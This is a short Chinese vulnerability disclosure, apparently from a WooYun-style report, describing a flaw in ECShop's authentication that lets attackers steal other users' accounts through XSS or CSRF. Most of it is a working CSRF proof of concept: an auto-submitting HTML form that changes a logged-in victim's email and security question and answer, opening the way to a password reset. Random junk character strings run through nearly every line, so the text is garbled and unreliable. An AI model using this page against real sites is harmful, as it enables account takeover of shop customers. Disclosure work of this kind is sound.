简要描述:
3 Z4 d; w( H& A) X3 ]2 Jecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现! P' A7 u; \! G$ H
6 M6 @8 F7 f/ _# U
Demo For:http://www.wooyun.org/bug.php?action=view&id=395* e6 |$ Z# `. j7 R1 M& `
3 B+ ]6 _6 r( O1 { d- z# y' \
详细说明:
. U- x% i) B: t$ J利用csrf和xss可以突破官方所说的“障碍”* r/ p% d; n [
xss版本已经有人说明
9 ^7 O6 T4 u9 m; V% K这里给出csrf版本7 L$ k( }& O5 w* D; _
~# b+ O4 u0 u. |漏洞证明:' c7 `2 w( \7 {2 e' b
<html>2 \( p, A3 k1 k) y
<body>$ U2 U8 B) J4 s" |# y0 M
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">; K4 {) r1 e, r$ S4 j/ }
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
% P& R* w, h7 e/ N( \+ y* w' D8 ? M<INPUT TYPE="text" NAME="act" value="act_edit_profile">' R0 x: S' g/ d D( n9 J
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
+ ~9 G/ \* H/ ?. {0 `3 Y<INPUT TYPE="text" NAME="passwd_answer" value="exploit">' m: S. A$ a& ?+ t% r
</body>
4 p- r0 x: N, f2 @& S8 y8 }<script>
7 O# b5 P! S) s: T2 xdocument.forms[0].submit();
) j* {3 t; x: F. A3 P6 N/ s/ \) n7 H</script>; v/ c, W; R5 M3 D) h! K8 g
</html>5 v; H" J. k; } E* ?
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失, A9 a/ Y8 v; K# _+ t* p2 H
1 X! o6 k/ n6 F% G7 ? |